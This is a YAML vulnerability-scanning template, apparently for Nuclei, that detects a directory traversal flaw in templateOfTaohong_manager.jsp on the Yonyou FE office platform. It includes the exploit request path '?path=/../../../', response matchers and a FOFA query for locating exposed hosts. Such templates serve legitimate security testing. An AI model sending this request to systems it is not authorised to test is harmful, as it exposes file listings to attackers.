32 lines
1.2 KiB
YAML
Executable File
32 lines
1.2 KiB
YAML
Executable File
id: yonyou-fe-directory-traversal
|
|
|
|
info:
|
|
name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal
|
|
author: SleepingBag945
|
|
severity: medium
|
|
description: |
|
|
There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
|
|
reference:
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
max-request: 2
|
|
fofa-query: "FE协作"
|
|
verified: true
|
|
tags: yonyou,fe,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "window.location=\"templateOfTaohong_manager.jsp?path=\""
|
|
- "var next=window.confirm(\"确定删除文件吗?\");"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |